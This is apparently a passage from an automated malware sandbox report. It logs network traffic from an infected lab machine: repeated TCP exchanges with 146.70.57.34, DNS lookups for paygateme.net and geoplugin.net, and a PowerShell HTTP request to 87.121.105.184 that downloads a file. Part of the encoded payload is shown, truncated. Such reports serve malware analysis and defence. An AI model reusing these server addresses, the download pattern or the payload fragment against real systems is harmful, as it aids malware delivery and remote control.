                                                                                          May 2, 2024 18:40:07.825778008 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:07.825790882 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:07.825807095 CEST497412286192.168.2.4146.70.57.34
                                                                                          May 2, 2024 18:40:07.825828075 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:07.825840950 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:07.825866938 CEST497412286192.168.2.4146.70.57.34
                                                                                          May 2, 2024 18:40:07.825896025 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:07.825907946 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:07.825932026 CEST497412286192.168.2.4146.70.57.34
                                                                                          May 2, 2024 18:40:07.826719046 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:07.826730967 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:07.826750040 CEST497412286192.168.2.4146.70.57.34
                                                                                          May 2, 2024 18:40:07.826771021 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:07.826807022 CEST497412286192.168.2.4146.70.57.34
                                                                                          May 2, 2024 18:40:07.827562094 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:07.827583075 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:07.827619076 CEST497412286192.168.2.4146.70.57.34
                                                                                          May 2, 2024 18:40:07.828855991 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:07.828870058 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:07.828898907 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:07.828905106 CEST497412286192.168.2.4146.70.57.34
                                                                                          May 2, 2024 18:40:07.829699039 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:07.829713106 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:07.829735041 CEST497412286192.168.2.4146.70.57.34
                                                                                          May 2, 2024 18:40:07.830370903 CEST497412286192.168.2.4146.70.57.34
                                                                                          May 2, 2024 18:40:07.830687046 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:07.830698967 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:07.830722094 CEST497412286192.168.2.4146.70.57.34
                                                                                          May 2, 2024 18:40:07.830744028 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:07.830779076 CEST497412286192.168.2.4146.70.57.34
                                                                                          May 2, 2024 18:40:07.831685066 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:07.831697941 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:07.831733942 CEST497412286192.168.2.4146.70.57.34
                                                                                          May 2, 2024 18:40:07.832613945 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:07.832626104 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:07.832637072 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:07.832657099 CEST497412286192.168.2.4146.70.57.34
                                                                                          May 2, 2024 18:40:07.833606958 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:07.833642960 CEST497412286192.168.2.4146.70.57.34
                                                                                          May 2, 2024 18:40:07.833648920 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:07.833662987 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:07.833698988 CEST497412286192.168.2.4146.70.57.34
                                                                                          May 2, 2024 18:40:07.834580898 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:07.834593058 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:07.834630013 CEST497412286192.168.2.4146.70.57.34
                                                                                          May 2, 2024 18:40:07.835664034 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:07.835675955 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:07.835710049 CEST497412286192.168.2.4146.70.57.34
                                                                                          May 2, 2024 18:40:07.835725069 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:07.836734056 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:07.836771965 CEST497412286192.168.2.4146.70.57.34
                                                                                          May 2, 2024 18:40:07.836776018 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:07.837697029 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:07.837733030 CEST497412286192.168.2.4146.70.57.34
                                                                                          May 2, 2024 18:40:07.837739944 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:07.837753057 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:07.837790012 CEST497412286192.168.2.4146.70.57.34
                                                                                          May 2, 2024 18:40:07.838500023 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:07.838512897 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:07.838543892 CEST497412286192.168.2.4146.70.57.34
                                                                                          May 2, 2024 18:40:07.839786053 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:07.839798927 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:07.839833021 CEST497412286192.168.2.4146.70.57.34
                                                                                          May 2, 2024 18:40:07.840703964 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:07.840717077 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:07.840750933 CEST497412286192.168.2.4146.70.57.34
                                                                                          May 2, 2024 18:40:07.841730118 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:07.841793060 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:07.841804981 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:07.841826916 CEST497412286192.168.2.4146.70.57.34
                                                                                          May 2, 2024 18:40:07.842745066 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:07.842757940 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:07.842780113 CEST497412286192.168.2.4146.70.57.34
                                                                                          May 2, 2024 18:40:07.843636990 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:07.843650103 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:07.843669891 CEST497412286192.168.2.4146.70.57.34
                                                                                          May 2, 2024 18:40:07.844749928 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:07.844765902 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:07.844784975 CEST497412286192.168.2.4146.70.57.34
                                                                                          May 2, 2024 18:40:07.845710039 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:07.845726013 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:07.845745087 CEST497412286192.168.2.4146.70.57.34
                                                                                          May 2, 2024 18:40:07.988581896 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:07.988769054 CEST497412286192.168.2.4146.70.57.34
                                                                                          May 2, 2024 18:40:08.132673979 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:08.141608953 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:08.141655922 CEST497412286192.168.2.4146.70.57.34
                                                                                          May 2, 2024 18:40:08.148746014 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:08.148760080 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:08.148817062 CEST497412286192.168.2.4146.70.57.34
                                                                                          May 2, 2024 18:40:08.149682045 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:08.149806023 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:08.149852037 CEST497412286192.168.2.4146.70.57.34
                                                                                          May 2, 2024 18:40:08.150630951 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:08.150681973 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:08.150717020 CEST497412286192.168.2.4146.70.57.34
                                                                                          May 2, 2024 18:40:08.151550055 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:08.151635885 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:08.151674032 CEST497412286192.168.2.4146.70.57.34
                                                                                          May 2, 2024 18:40:08.152551889 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:08.152565956 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:08.152616024 CEST497412286192.168.2.4146.70.57.34
                                                                                          May 2, 2024 18:40:08.164690971 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:08.165574074 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:08.165621996 CEST497412286192.168.2.4146.70.57.34
                                                                                          May 2, 2024 18:40:08.165640116 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:08.166691065 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:08.166757107 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:08.166830063 CEST497412286192.168.2.4146.70.57.34
                                                                                          May 2, 2024 18:40:08.167546034 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:08.167557955 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:08.167593002 CEST497412286192.168.2.4146.70.57.34
                                                                                          May 2, 2024 18:40:08.168592930 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:08.168638945 CEST497412286192.168.2.4146.70.57.34
                                                                                          May 2, 2024 18:40:08.168642998 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:08.169523954 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:08.169567108 CEST497412286192.168.2.4146.70.57.34
                                                                                          May 2, 2024 18:40:08.180615902 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:08.180653095 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:08.180697918 CEST497412286192.168.2.4146.70.57.34
                                                                                          May 2, 2024 18:40:08.181520939 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:08.181556940 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:08.181570053 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:08.181597948 CEST497412286192.168.2.4146.70.57.34
                                                                                          May 2, 2024 18:40:08.182946920 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:08.182990074 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:08.182993889 CEST497412286192.168.2.4146.70.57.34
                                                                                          May 2, 2024 18:40:08.183558941 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:08.183602095 CEST497412286192.168.2.4146.70.57.34
                                                                                          May 2, 2024 18:40:08.183617115 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:08.185225964 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:08.185245037 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:08.185264111 CEST497412286192.168.2.4146.70.57.34
                                                                                          May 2, 2024 18:40:08.185796022 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:08.185827971 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:08.185842991 CEST497412286192.168.2.4146.70.57.34
                                                                                          May 2, 2024 18:40:08.186629057 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:08.186672926 CEST497412286192.168.2.4146.70.57.34
                                                                                          May 2, 2024 18:40:08.186728954 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:08.187592983 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:08.187635899 CEST497412286192.168.2.4146.70.57.34
                                                                                          May 2, 2024 18:40:08.187649965 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:08.187663078 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:08.187700033 CEST497412286192.168.2.4146.70.57.34
                                                                                          May 2, 2024 18:40:08.188463926 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:08.188476086 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:08.188519001 CEST497412286192.168.2.4146.70.57.34
                                                                                          May 2, 2024 18:40:08.189582109 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:08.189644098 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:08.189682961 CEST497412286192.168.2.4146.70.57.34
                                                                                          May 2, 2024 18:40:08.190608978 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:08.190686941 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:08.190705061 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:08.190726042 CEST497412286192.168.2.4146.70.57.34
                                                                                          May 2, 2024 18:40:08.191600084 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:08.191612005 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:08.191642046 CEST497412286192.168.2.4146.70.57.34
                                                                                          May 2, 2024 18:40:08.192692995 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:08.192704916 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:08.192728043 CEST497412286192.168.2.4146.70.57.34
                                                                                          May 2, 2024 18:40:08.194539070 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:08.194601059 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:08.194607019 CEST497412286192.168.2.4146.70.57.34
                                                                                          May 2, 2024 18:40:08.203233004 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:08.203252077 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:08.203274012 CEST497412286192.168.2.4146.70.57.34
                                                                                          May 2, 2024 18:40:08.203635931 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:08.203649998 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:08.203669071 CEST497412286192.168.2.4146.70.57.34
                                                                                          May 2, 2024 18:40:08.203731060 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:08.203743935 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:08.203757048 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:08.203764915 CEST497412286192.168.2.4146.70.57.34
                                                                                          May 2, 2024 18:40:08.203771114 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:08.203784943 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:08.203789949 CEST497412286192.168.2.4146.70.57.34
                                                                                          May 2, 2024 18:40:08.203797102 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:08.203819036 CEST497412286192.168.2.4146.70.57.34
                                                                                          May 2, 2024 18:40:08.203819990 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:08.203831911 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:08.203852892 CEST497412286192.168.2.4146.70.57.34
                                                                                          May 2, 2024 18:40:08.203864098 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:08.203897953 CEST497412286192.168.2.4146.70.57.34
                                                                                          May 2, 2024 18:40:08.203912973 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:08.203936100 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:08.203969955 CEST497412286192.168.2.4146.70.57.34
                                                                                          May 2, 2024 18:40:08.203986883 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:08.204021931 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:08.204056025 CEST497412286192.168.2.4146.70.57.34
                                                                                          May 2, 2024 18:40:08.204061031 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:08.204092026 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:08.204112053 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:08.204125881 CEST497412286192.168.2.4146.70.57.34
                                                                                          May 2, 2024 18:40:08.204859972 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:08.204876900 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:08.204895973 CEST497412286192.168.2.4146.70.57.34
                                                                                          May 2, 2024 18:40:08.206319094 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:08.206355095 CEST497412286192.168.2.4146.70.57.34
                                                                                          May 2, 2024 18:40:08.206413984 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:08.206568956 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:08.206582069 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:08.206593037 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:08.206598043 CEST497412286192.168.2.4146.70.57.34
                                                                                          May 2, 2024 18:40:08.206629038 CEST497412286192.168.2.4146.70.57.34
                                                                                          May 2, 2024 18:40:08.207526922 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:08.207602978 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:08.207616091 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:08.207636118 CEST497412286192.168.2.4146.70.57.34
                                                                                          May 2, 2024 18:40:08.208556890 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:08.208597898 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:08.208614111 CEST497412286192.168.2.4146.70.57.34
                                                                                          May 2, 2024 18:40:08.209672928 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:08.209685087 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:08.209696054 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:08.209714890 CEST497412286192.168.2.4146.70.57.34
                                                                                          May 2, 2024 18:40:08.209728003 CEST497412286192.168.2.4146.70.57.34
                                                                                          May 2, 2024 18:40:08.210575104 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:08.210594893 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:08.210632086 CEST497412286192.168.2.4146.70.57.34
                                                                                          May 2, 2024 18:40:08.211719036 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:08.211760044 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:08.211771965 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:08.211788893 CEST497412286192.168.2.4146.70.57.34
                                                                                          May 2, 2024 18:40:08.212620974 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:08.212641001 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:08.212655067 CEST497412286192.168.2.4146.70.57.34
                                                                                          May 2, 2024 18:40:08.333830118 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:08.333899975 CEST497412286192.168.2.4146.70.57.34
                                                                                          May 2, 2024 18:40:08.356699944 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:08.494354010 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:08.494421959 CEST497412286192.168.2.4146.70.57.34
                                                                                          May 2, 2024 18:40:08.516796112 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:08.516809940 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:08.516861916 CEST497412286192.168.2.4146.70.57.34
                                                                                          May 2, 2024 18:40:08.517707109 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:08.517829895 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:08.517865896 CEST497412286192.168.2.4146.70.57.34
                                                                                          May 2, 2024 18:40:08.522759914 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:08.643918037 CEST497412286192.168.2.4146.70.57.34
                                                                                          May 2, 2024 18:40:11.396720886 CEST497412286192.168.2.4146.70.57.34
                                                                                          May 2, 2024 18:40:17.212019920 CEST497412286192.168.2.4146.70.57.34
                                                                                          May 2, 2024 18:40:17.555037022 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:17.555053949 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:17.555063963 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:17.555073977 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:17.555083990 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:17.555192947 CEST497412286192.168.2.4146.70.57.34
                                                                                          May 2, 2024 18:40:17.893800020 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:17.893820047 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:17.913775921 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:17.924650908 CEST228649741146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:17.924907923 CEST497412286192.168.2.4146.70.57.34
                                                                                          May 2, 2024 18:40:21.774429083 CEST228649740146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:21.778825045 CEST497402286192.168.2.4146.70.57.34
                                                                                          May 2, 2024 18:40:22.180222988 CEST228649740146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:31.425182104 CEST804973887.121.105.184192.168.2.4
                                                                                          May 2, 2024 18:40:51.812218904 CEST228649740146.70.57.34192.168.2.4
                                                                                          May 2, 2024 18:40:51.814271927 CEST497402286192.168.2.4146.70.57.34
                                                                                          May 2, 2024 18:40:52.213327885 CEST228649740146.70.57.34192.168.2.4
                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                          May 2, 2024 18:40:00.968080044 CEST5070553192.168.2.41.1.1.1
                                                                                          May 2, 2024 18:40:01.177423000 CEST53507051.1.1.1192.168.2.4
                                                                                          May 2, 2024 18:40:04.090719938 CEST5511853192.168.2.41.1.1.1
                                                                                          May 2, 2024 18:40:04.183386087 CEST53551181.1.1.1192.168.2.4
                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                          May 2, 2024 18:40:00.968080044 CEST192.168.2.41.1.1.10xea76Standard query (0)paygateme.netA (IP address)IN (0x0001)false
                                                                                          May 2, 2024 18:40:04.090719938 CEST192.168.2.41.1.1.10x9eadStandard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                          May 2, 2024 18:38:51.690160036 CEST1.1.1.1192.168.2.40x3093No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                          May 2, 2024 18:38:51.690160036 CEST1.1.1.1192.168.2.40x3093No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                          May 2, 2024 18:40:01.177423000 CEST1.1.1.1192.168.2.40xea76No error (0)paygateme.net146.70.57.34A (IP address)IN (0x0001)false
                                                                                          May 2, 2024 18:40:04.183386087 CEST1.1.1.1192.168.2.40x9eadNo error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                                                          • 87.121.105.184
                                                                                          • geoplugin.net
                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          0192.168.2.44973187.121.105.184806868C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          May 2, 2024 18:39:11.435287952 CEST176OUTGET /Udvejningernes.aaf HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Host: 87.121.105.184
                                                                                          Connection: Keep-Alive
                                                                                          May 2, 2024 18:39:11.603921890 CEST1289INHTTP/1.1 200 OK
                                                                                          Date: Thu, 02 May 2024 16:39:11 GMT
                                                                                          Server: Apache/2.4.41 (Ubuntu)
                                                                                          Last-Modified: Tue, 30 Apr 2024 08:37:27 GMT
                                                                                          ETag: "73894-6174c47a1bfc0"
                                                                                          Accept-Ranges: bytes
                                                                                          Content-Length: 473236
                                                                                          Keep-Alive: timeout=5, max=100
                                                                                          Connection: Keep-Alive
                                                                                          Data Raw: 63 51 47 62 36 77 4b 66 69 37 73 30 4e 67 6b 41 36 77 4b 57 59 48 45 42 6d 77 4e 63 4a 41 54 72 41 6f 58 67 36 77 49 49 70 62 6c 35 41 4b 73 4b 36 77 4b 37 7a 58 45 42 6d 34 48 42 41 31 4e 46 4d 48 45 42 6d 2b 73 43 51 71 6d 42 36 58 78 54 38 44 72 72 41 69 48 78 36 77 49 53 4d 6e 45 42 6d 2b 73 43 4b 2f 79 36 53 72 65 6a 54 33 45 42 6d 33 45 42 6d 2b 73 43 75 42 58 72 41 68 62 73 4d 63 70 78 41 5a 76 72 41 68 58 33 69 52 51 4c 36 77 4a 2f 30 65 73 43 66 67 66 52 34 75 73 43 77 38 54 72 41 6d 55 54 67 38 45 45 63 51 47 62 36 77 49 33 52 6f 48 35 6a 4a 7a 72 41 58 7a 49 63 51 47 62 36 77 49 51 50 34 74 45 4a 41 54 72 41 69 79 6a 36 77 4c 46 37 6f 6e 44 36 77 4a 49 6f 6e 45 42 6d 34 48 44 38 78 4d 33 41 65 73 43 57 6e 76 72 41 74 42 44 75 74 57 37 50 4c 42 78 41 5a 76 72 41 76 59 59 67 66 49 54 64 53 43 58 36 77 4c 73 65 65 73 43 50 4c 61 42 36 73 62 4f 48 43 66 72 41 6f 74 78 63 51 47 62 63 51 47 62 63 51 47 62 63 51 47 62 63 51 47 62 69 77 77 51 63 51 47 62 36 77 4a 73 4a 6f 6b 4d 45 33 45 42 6d 2b [TRUNCATED]
                                                                                          Data Ascii: cQGb6wKfi7s0NgkA6wKWYHEBmwNcJATrAoXg6wIIpbl5AKsK6wK7zXEBm4HBA1NFMHEBm+sCQqmB6XxT8DrrAiHx6wISMnEBm+sCK/y6SrejT3EBm3EBm+sCuBXrAhbsMcpxAZvrAhX3iRQL6wJ/0esCfgfR4usCw8TrAmUTg8EEcQGb6wI3RoH5jJzrAXzIcQGb6wIQP4tEJATrAiyj6wLF7onD6wJIonEBm4HD8xM3AesCWnvrAtBDutW7PLBxAZvrAvYYgfITdSCX6wLseesCPLaB6sbOHCfrAotxcQGbcQGbcQGbcQGbcQGbiwwQcQGb6wJsJokME3EBm+sC+ZBCcQGbcQGbgfok+gQAdddxAZtxAZuJXCQM6wLjbesC3FeB7QADAABxAZvrAnFVi1QkCOsCoqXrAmubi3wkBHEBm3EBm4nr6wJStXEBm4HDnAAAAHEBm3EBm1NxAZtxAZtqQHEBm3EBm4nr6wI+W+sCclvHgwABAAAA4PcBcQGbcQGbgcMAAQAA6wKE+nEBm1NxAZvrAgDuievrAmwV6wIqKIm7BAEAAOsCzWZxAZuBwwQBAADrAlOecQGbU+sCUe3rAqDBav/rApHC6wL1uoPCBXEBm+sCcw0x9nEBm3EBmzHJcQGb6wLUdYsacQGbcQGbQesCF5hxAZs5HAp183EBm+sCK0VGcQGb6wJL9oB8Cvu4dd3rAtf7cQGbi0QK/OsC835xAZsp8HEBm+sC1qv/0nEBm3EBm7ok+gQA6wJBWOsCFWgxwHEBm+sC09yLfCQM6wLmUnEBm4E0B6iPth/rAt+V6wKfC4PABHEBm+sCFO850HXjcQGbcQGbiftxAZvrAr3S/9dxAZvrAqBdzrZ1m00GU5btCA7kFNvuKgNfKH2dZFOwUorzZjKwn9sjyjFKLFU/+hFy0yxTC32eWRoNCajpM98pftkFWN037rdLY7YsetCeVgv+2OyCtjFOkrSe7IK2OhceWZ7sgramTtO1eSl1AV0p [TRUNCATED]
                                                                                          May 2, 2024 18:39:11.603940010 CEST1289INData Raw: 63 5a 70 70 6a 72 59 66 6a 33 54 73 78 70 42 4d 4e 36 70 70 6a 72 59 66 34 79 52 79 5a 43 78 6f 4e 35 70 70 6a 72 59 66 57 68 48 50 54 53 6b 4b 64 78 36 6f 6a 78 4d 50 51 49 58 33 34 43 56 4f 74 78 2b 6f 2b 6b 46 65 7a 67 70 73 6c 69 33 49 74 42
